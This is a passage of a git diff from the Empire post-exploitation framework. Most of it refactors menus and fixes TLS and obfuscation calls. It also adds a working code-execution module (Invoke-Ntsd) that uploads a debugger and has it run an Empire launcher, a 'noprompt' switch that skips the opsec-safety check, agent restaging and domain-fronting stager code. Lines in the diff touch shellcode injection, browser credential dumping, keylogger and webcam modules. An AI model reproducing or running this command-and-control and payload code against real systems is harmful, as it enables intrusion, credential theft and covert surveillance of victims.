self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command) - # update the agent log msg = "Tasked agent to kill process: " + str(process) self.mainMenu.agents.save_agent_log(self.sessionID, msg) @@ -2285,13 +2324,11 @@ class PowerShellAgentMenu(cmd.Cmd): return self.mainMenu.complete_creds(text, line, begidx, endidx) -class PythonAgentMenu(cmd.Cmd): +class PythonAgentMenu(SubMenu): def __init__(self, mainMenu, sessionID): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.sessionID = sessionID @@ -2312,9 +2349,6 @@ class PythonAgentMenu(cmd.Cmd): if results: print "\n" + results.rstrip('\r\n') - # def preloop(self): - # traceback.print_stack() - def handle_agent_event(self, signal, sender): """ Handle agent event signals. @@ -2334,51 +2368,13 @@ class PythonAgentMenu(cmd.Cmd): if (str(self.sessionID) in signal) or (str(name) in signal): print helpers.color(signal) - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, cmds, cmdlen, maxcol): - if cmds: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for c in cmds: - self.stdout.write("%s %s\n" % (c.ljust(17), getattr(self, 'do_' + c).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def default(self, line): "Default handler" print helpers.color("[!] Command not recognized, use 'help' to see available commands") - - def do_back(self, line): - "Go back a menu." - return True - - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - def do_help(self, *args): "Displays the help menu or syntax for particular commands." - cmd.Cmd.do_help(self, *args) + SubMenu.do_help(self, *args) def do_list(self, line): @@ -2703,6 +2699,7 @@ class PythonAgentMenu(cmd.Cmd): # Strip asterisks added by MainMenu.complete_usemodule() module = "python/%s" %(line.strip().rstrip("*")) + if module not in self.mainMenu.modules.modules: print helpers.color("[!] Error: invalid module") else: @@ -2834,14 +2831,12 @@ class PythonAgentMenu(cmd.Cmd): # return helpers.complete_path(text,line) -class ListenersMenu(cmd.Cmd): +class ListenersMenu(SubMenu): """ The main class used by Empire to drive the 'listener' menu. """ def __init__(self, mainMenu): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) self.doc_header = 'Listener Commands' @@ -2851,45 +2846,10 @@ class ListenersMenu(cmd.Cmd): # display all active listeners on menu startup messages.display_active_listeners(self.mainMenu.listeners.activeListeners) - # def preloop(self): - # traceback.print_stack() - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def emptyline(self): - pass - - def do_back(self, line): "Go back to the main menu." raise NavMain() - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "List all active listeners (or agents)." @@ -2966,7 +2926,7 @@ class ListenersMenu(cmd.Cmd): def do_launcher(self, line): "Generate an initial launcher for a listener." - + parts = line.strip().split() if len(parts) != 2: print helpers.color("[!] Please enter 'launcher '") @@ -3047,13 +3007,11 @@ class ListenersMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class ListenerMenu(cmd.Cmd): +class ListenerMenu(SubMenu): def __init__(self, mainMenu, listenerName): - cmd.Cmd.__init__(self) - - self.mainMenu = mainMenu + SubMenu.__init__(self, mainMenu) if listenerName not in self.mainMenu.listeners.loadedListeners: print helpers.color("[!] Listener '%s' not currently valid!" % (listenerName)) @@ -3067,39 +3025,6 @@ class ListenerMenu(cmd.Cmd): # set the text prompt self.prompt = '(Empire: ' + helpers.color("listeners/%s" % (listenerName), 'red') + ') > ' - - def emptyline(self): - """ - If any empty line is entered, do nothing. - """ - pass - - - def do_back(self, line): - "Go back a menu." - return True - - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_info(self, line): "Display listener module options." messages.display_listener_module(self.listener) @@ -3224,15 +3149,14 @@ class ListenerMenu(cmd.Cmd): return [s[offs:] for s in languages if s.startswith(mline)] -class ModuleMenu(cmd.Cmd): +class ModuleMenu(SubMenu): """ The main class used by Empire to drive the 'module' menu. """ def __init__(self, mainMenu, moduleName, agent=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Module Commands' - self.mainMenu = mainMenu try: # get the current module/name @@ -3251,10 +3175,7 @@ class ModuleMenu(cmd.Cmd): except Exception as e: print helpers.color("[!] ModuleMenu() init error: %s" % (e)) - # def preloop(self): - # traceback.print_stack() - - def validate_options(self): + def validate_options(self, prompt): "Ensure all required module options are completed." # ensure all 'Required=True' options are filled in @@ -3288,8 +3209,9 @@ class ModuleMenu(cmd.Cmd): print helpers.color("[!] Error: module needs to run in an elevated context.") return False - # if the module isn't opsec safe, prompt before running - if ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + # if the module isn't opsec safe, prompt before running (unless "execute noprompt" was issued) + if prompt and ('OpsecSafe' in self.module.info) and (not self.module.info['OpsecSafe']): + try: choice = raw_input(helpers.color("[>] Module is not opsec safe, run? [y/N] ", "red")) if not (choice.lower() != "" and choice.lower()[0] == "y"): @@ -3300,48 +3222,6 @@ class ModuleMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." @@ -3352,7 +3232,6 @@ class ModuleMenu(cmd.Cmd): else: print helpers.color("[!] Please use 'list [agents/listeners] '.") - def do_reload(self, line): "Reload the current module." @@ -3444,7 +3323,11 @@ class ModuleMenu(cmd.Cmd): def do_execute(self, line): "Execute the given Empire module." - if not self.validate_options(): + prompt = True + if line == "noprompt": + prompt = False + + if not self.validate_options(prompt): return if self.moduleName.lower().startswith('external/'): @@ -3634,16 +3517,14 @@ class ModuleMenu(cmd.Cmd): return [s[offs:] for s in names if s.startswith(mline)] -class StagerMenu(cmd.Cmd): +class StagerMenu(SubMenu): """ The main class used by Empire to drive the 'stager' menu. """ def __init__(self, mainMenu, stagerName, listener=None): - cmd.Cmd.__init__(self) + SubMenu.__init__(self, mainMenu) self.doc_header = 'Stager Menu' - self.mainMenu = mainMenu - # get the current stager name self.stagerName = stagerName self.stager = self.mainMenu.stagers.stagers[stagerName] @@ -3657,7 +3538,6 @@ class StagerMenu(cmd.Cmd): listener = self.mainMenu.listeners.get_listener(listener) self.stager.options['Listener']['Value'] = listener - def validate_options(self): "Make sure all required stager options are completed." @@ -3674,48 +3554,6 @@ class StagerMenu(cmd.Cmd): return True - - def emptyline(self): - pass - - - # print a nicely formatted help menu - # stolen/adapted from recon-ng - def print_topics(self, header, commands, cmdlen, maxcol): - if commands: - self.stdout.write("%s\n" % str(header)) - if self.ruler: - self.stdout.write("%s\n" % str(self.ruler * len(header))) - for command in commands: - self.stdout.write("%s %s\n" % (command.ljust(17), getattr(self, 'do_' + command).__doc__)) - self.stdout.write("\n") - - - def do_back(self, line): - "Go back a menu." - return True - - - def do_agents(self, line): - "Jump to the Agents menu." - raise NavAgents() - - - def do_listeners(self, line): - "Jump to the listeners menu." - raise NavListeners() - - - def do_main(self, line): - "Go back to the main menu." - raise NavMain() - - - def do_exit(self, line): - "Exit Empire." - raise KeyboardInterrupt - - def do_list(self, line): "Lists all active agents (or listeners)." @@ -3783,7 +3621,6 @@ class StagerMenu(cmd.Cmd): def do_generate(self, line): "Generate/execute the given Empire stager." - if not self.validate_options(): return @@ -3814,7 +3651,6 @@ class StagerMenu(cmd.Cmd): os.chmod(savePath, 777) print "\n" + helpers.color("[*] Stager output written out to: %s\n" % (savePath)) - else: print stagerOutput diff --git a/lib/common/listeners.py b/lib/common/listeners.py index 31507dd..2a216b5 100644 --- a/lib/common/listeners.py +++ b/lib/common/listeners.py @@ -4,7 +4,7 @@ Listener handling functionality for Empire. """ - +import sys import fnmatch import imp import helpers diff --git a/lib/common/packets.py b/lib/common/packets.py index e47325a..4913639 100644 --- a/lib/common/packets.py +++ b/lib/common/packets.py @@ -200,14 +200,7 @@ def parse_result_packet(packet, offset=0): taskID = struct.unpack('=H', packet[6+offset:8+offset])[0] length = struct.unpack('=L', packet[8+offset:12+offset])[0] if length != '0': - if length % 4: - #padding fix - datapart = packet[12+offset:12+offset+length] - datapart += '=' * (4 - length % 4) - data = base64.b64decode(datapart) - else: - data = base64.b64decode(packet[12+offset:12+offset+length]) - #data = base64.b64decode(packet[12+offset:12+offset+length]) + data = base64.b64decode(packet[12+offset:12+offset+length]) else: data = None remainingData = packet[12+offset+length:] diff --git a/lib/common/stagers.py b/lib/common/stagers.py index b062403..5f4b236 100644 --- a/lib/common/stagers.py +++ b/lib/common/stagers.py @@ -18,6 +18,7 @@ import fnmatch import imp import helpers import os +import errno import macholib.MachO import shutil import zipfile @@ -443,6 +444,15 @@ class Stagers: javacode = file.read() file.close() javacode = javacode.replace("LAUNCHER",launcherCode) + jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/' + try: + os.makedirs(jarpath) + except OSError as e: + if e.errno != errno.EEXIST: + raise + else: + pass + file = open(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java','w') file.write(javacode) file.close() @@ -460,6 +470,7 @@ class Stagers: return jar + def generate_upload(self, file, path): script = """ $b64 = "BASE64_BLOB_GOES_HERE" diff --git a/lib/listeners/dbx.py b/lib/listeners/dbx.py index cb652be..0421df5 100755 --- a/lib/listeners/dbx.py +++ b/lib/listeners/dbx.py @@ -111,6 +111,16 @@ class Listener: 'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : '' + }, + 'SlackToken' : { + 'Description' : 'Your SlackBot API token to communicate with your Slack instance.', + 'Required' : False, + 'Value' : '' + }, + 'SlackChannel' : { + 'Description' : 'The Slack channel or DM that notifications will be sent to.', + 'Required' : False, + 'Value' : '#general' } } diff --git a/lib/listeners/http.py b/lib/listeners/http.py index d0e70f0..e4f4d5f 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -1,5 +1,6 @@ import logging import base64 +import sys import random import os import ssl @@ -107,7 +108,7 @@ class Listener: 'Value' : 'Microsoft-IIS/7.5' }, 'StagerURI' : { - 'Description' : 'URI for the stager. Example: stager.php', + 'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php', 'Required' : False, 'Value' : '' }, @@ -295,10 +296,11 @@ class Listener: for header in customHeaders: headerKey = header.split(':')[0] headerValue = header.split(':')[1] - #If host header defined, assume domain fronting is in use and add a call to the base URL first - #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello - if headerKey.lower() == "host": - stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};") + #If host header defined, assume domain fronting is in use and add a call to the base URL first + #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello + if headerKey.lower() == "host": + stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};") + stager += helpers.randomize_capitalization("$wc.Headers.Add(") stager += "\"%s\",\"%s\");" % (headerKey, headerValue) @@ -494,7 +496,7 @@ class Listener: randomizedStager += line if obfuscate: - randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand) + randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) @@ -585,7 +587,7 @@ class Listener: if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: - code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code elif language == 'python': @@ -708,6 +710,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } @@ -758,6 +764,10 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 + #if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) + return (HTTPError.code, '') except urllib2.URLError as URLerror: @@ -884,7 +894,7 @@ def send_message(packets=None): if 'not in cache' in results: # signal the client to restage - print helpers.color("[*] Orphaned agent from %s, signaling retaging" % (clientIP)) + print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)) return make_response(self.default_response(), 401) else: return make_response(self.default_response(), 200) @@ -963,7 +973,18 @@ def send_message(packets=None): host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + pyversion = sys.version_info + + # support any version of tls + pyversion = sys.version_info + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py index 1e8f7c8..4ee4322 100644 --- a/lib/listeners/http_com.py +++ b/lib/listeners/http_com.py @@ -5,6 +5,7 @@ import os import ssl import time import copy +import sys from pydispatch import dispatcher from flask import Flask, request, make_response @@ -313,7 +314,7 @@ class Listener: randomizedStager += line if obfuscate: - randomizedStager = helpers.obfuscate(randomizedStager, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) + randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand) # base64 encode the stager and return it if encode: return helpers.enc_powershell(randomizedStager) @@ -369,7 +370,7 @@ class Listener: if killDate != "": code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',") if obfuscate: - code = helpers.obfuscate(code, self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) + code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand) return code else: @@ -460,6 +461,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } @@ -630,7 +635,17 @@ class Listener: host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + + # support any version of tls + pyversion = sys.version_info + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py index a03f7b2..25d7b41 100644 --- a/lib/listeners/http_foreign.py +++ b/lib/listeners/http_foreign.py @@ -451,6 +451,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } @@ -498,7 +502,9 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 - return (HTTPError.code, '') + r#if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) except urllib2.URLError as URLerror: # if the server cannot be reached diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py index fbc606e..f03703e 100644 --- a/lib/listeners/http_hop.py +++ b/lib/listeners/http_hop.py @@ -419,6 +419,10 @@ class Listener: } catch [System.Net.WebException]{ # exception posting data... + if ($_.Exception.GetBaseException().Response.statuscode -eq 401) { + # restart key negotiation + Start-Negotiate -S "$ser" -SK $SK -UA $ua + } } } } @@ -466,7 +470,9 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 - return (HTTPError.code, '') + #if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) except urllib2.URLError as URLerror: # if the server cannot be reached diff --git a/lib/listeners/http_mapi.py b/lib/listeners/http_mapi.py index 5bb07ef..d3a172a 100644 --- a/lib/listeners/http_mapi.py +++ b/lib/listeners/http_mapi.py @@ -5,6 +5,7 @@ import os import ssl import time import copy +import sys from pydispatch import dispatcher from flask import Flask, request, make_response @@ -616,7 +617,17 @@ class Listener: host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) - context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + + # support any version of tls + pyversion = sys.version_info + if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: + proto = ssl.PROTOCOL_TLS + elif pyversion[0] >= 3: + proto = ssl.PROTOCOL_TLS + else: + proto = ssl.PROTOCOL_SSLv23 + + context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: diff --git a/lib/modules/powershell/code_execution/invoke_dllinjection.py b/lib/modules/powershell/code_execution/invoke_dllinjection.py index 3f2a94e..682b8d7 100644 --- a/lib/modules/powershell/code_execution/invoke_dllinjection.py +++ b/lib/modules/powershell/code_execution/invoke_dllinjection.py @@ -88,6 +88,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py index 38c4c6d..62c83f8 100644 --- a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py +++ b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py @@ -72,6 +72,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_ntsd.py b/lib/modules/powershell/code_execution/invoke_ntsd.py new file mode 100644 index 0000000..4ba07e9 --- /dev/null +++ b/lib/modules/powershell/code_execution/invoke_ntsd.py @@ -0,0 +1,165 @@ +from lib.common import helpers +import base64 + +class Module: + + def __init__(self, mainMenu, params=[]): + + self.info = { + 'Name': 'Invoke-Ntsd', + + 'Author': ['james fitts'], + + 'Description': ("Use NT Symbolic Debugger to execute Empire launcher code"), + + 'Background' : True, + + 'OutputExtension' : None, + + 'NeedsAdmin' : False, + + 'OpsecSafe' : False, + + 'Language' : 'powershell', + + 'MinLanguageVersion' : '2', + + 'Comments': [""] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Agent' : { + 'Description' : 'Agent to run module on.', + 'Required' : True, + 'Value' : '' + }, + 'UploadPath' : { + 'Description' : 'Path to drop dll (C:\Users\Administrator\Desktop).', + 'Required' : False, + 'Value' : '' + }, + 'Listener' : { + 'Description' : 'Listener to use.', + 'Required' : True, + 'Value' : '' + }, + 'UserAgent' : { + 'Description' : 'User-agent string to use for the staging request (default, none, or other).', + 'Required' : False, + 'Value' : 'default' + }, + 'Proxy' : { + 'Description' : 'Proxy to use for request (default, none, or other).', + 'Required' : False, + 'Value' : 'default' + }, + 'BinPath' : { + 'Description' : 'Binary to set NTSD to debug.', + 'Required' : True, + 'Value' : "C:\\Windows\\System32\\calc.exe" + }, + 'Arch' : { + 'Description' : 'Architecture the system is on.', + 'Required' : True, + 'Value' : 'x64' + }, + 'ProxyCreds' : { + 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', + 'Required' : False, + 'Value' : 'default' + } + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + + def generate(self, obfuscate=False, obfuscationCommand=""): + + listenerName = self.options['Listener']['Value'] + uploadPath = self.options['UploadPath']['Value'].strip() + bin = self.options['BinPath']['Value'] + arch = self.options['Arch']['Value'] + ntsd_exe_upload_path = uploadPath + "\\" + "ntsd.exe" + ntsd_dll_upload_path = uploadPath + "\\" + "ntsdexts.dll" + + # staging options + userAgent = self.options['UserAgent']['Value'] + proxy = self.options['Proxy']['Value'] + proxyCreds = self.options['ProxyCreds']['Value'] + + if arch == 'x64': + ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x64.exe" + ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x64.dll" + elif arch == 'x86': + ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x86.exe" + ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x86.dll" + + # read in the common module source code + moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Invoke-Ntsd.ps1" + if obfuscate: + helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) + moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") + try: + f = open(moduleSource, 'r') + except: + print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) + return "" + + moduleCode = f.read() + f.close() + + script = moduleCode + scriptEnd = "" + if not self.mainMenu.listeners.is_listener_valid(listenerName): + # not a valid listener, return nothing for the script + print helpers.color("[!] Invalid listener: %s" %(listenerName)) + return '' + else: + + l = self.mainMenu.stagers.stagers['multi/launcher'] + l.options['Listener']['Value'] = self.options['Listener']['Value'] + l.options['UserAgent']['Value'] = self.options['UserAgent']['Value'] + l.options['Proxy']['Value'] = self.options['Proxy']['Value'] + l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value'] + launcher = l.generate() + + if launcher == '': + print helpers.color('[!] Error in launcher generation.') + return '' + else: + launcherCode = launcher.split(' ')[-1] + + with open(ntsd_exe, 'rb') as bin_data: + ntsd_exe_data = bin_data.read() + + with open(ntsd_dll, 'rb') as bin_data: + ntsd_dll_data = bin_data.read() + + exec_write = "Write-Ini %s \"%s\"" % (uploadPath, launcher) + code_exec = "%s\\ntsd.exe -cf %s\\ntsd.ini %s" % (uploadPath, uploadPath, bin) + ntsd_exe_upload = self.mainMenu.stagers.generate_upload(ntsd_exe_data, ntsd_exe_upload_path) + ntsd_dll_upload = self.mainMenu.stagers.generate_upload(ntsd_dll_data, ntsd_dll_upload_path) + + script += "\r\n" + script += ntsd_exe_upload + script += ntsd_dll_upload + script += "\r\n" + script += exec_write + script += "\r\n" + # this is to make sure everything was uploaded properly + script += "Start-Sleep -s 5" + script += "\r\n" + script += code_exec + + return script diff --git a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py index 531b1f9..7851ee4 100644 --- a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py +++ b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py @@ -127,6 +127,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_shellcode.py b/lib/modules/powershell/code_execution/invoke_shellcode.py index 2bf16e6..354c783 100644 --- a/lib/modules/powershell/code_execution/invoke_shellcode.py +++ b/lib/modules/powershell/code_execution/invoke_shellcode.py @@ -145,6 +145,6 @@ class Module: scriptEnd += "; 'Shellcode injected.'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py index fe0d112..e18b565 100644 --- a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py +++ b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py @@ -89,6 +89,6 @@ class Module: sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/ChromeDump.py b/lib/modules/powershell/collection/ChromeDump.py index 1c3ccd0..dec2c33 100644 --- a/lib/modules/powershell/collection/ChromeDump.py +++ b/lib/modules/powershell/collection/ChromeDump.py @@ -103,6 +103,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/FoxDump.py b/lib/modules/powershell/collection/FoxDump.py index 29ae719..b7fb455 100644 --- a/lib/modules/powershell/collection/FoxDump.py +++ b/lib/modules/powershell/collection/FoxDump.py @@ -107,6 +107,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/USBKeylogger.py b/lib/modules/powershell/collection/USBKeylogger.py index 3ab8daf..8fa6881 100644 --- a/lib/modules/powershell/collection/USBKeylogger.py +++ b/lib/modules/powershell/collection/USBKeylogger.py @@ -79,6 +79,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/WebcamRecorder.py b/lib/modules/powershell/collection/WebcamRecorder.py index 763cf41..6258f09 100644 --- a/lib/modules/powershell/collection/WebcamRecorder.py +++ b/lib/modules/powershell/collection/WebcamRecorder.py @@ -216,5 +216,5 @@ Start-WebcamRecorder""" else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/browser_data.py b/lib/modules/powershell/collection/browser_data.py index 0a455b5..6f0f9a0 100644 --- a/lib/modules/powershell/collection/browser_data.py +++ b/lib/modules/powershell/collection/browser_data.py @@ -103,6 +103,6 @@ class Module: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/clipboard_monitor.py b/lib/modules/powershell/collection/clipboard_monitor.py index d12fe04..e13bac2 100644 --- a/lib/modules/powershell/collection/clipboard_monitor.py +++ b/lib/modules/powershell/collection/clipboard_monitor.py @@ -89,6 +89,6 @@ class Module: else: scriptEnd += " -" + 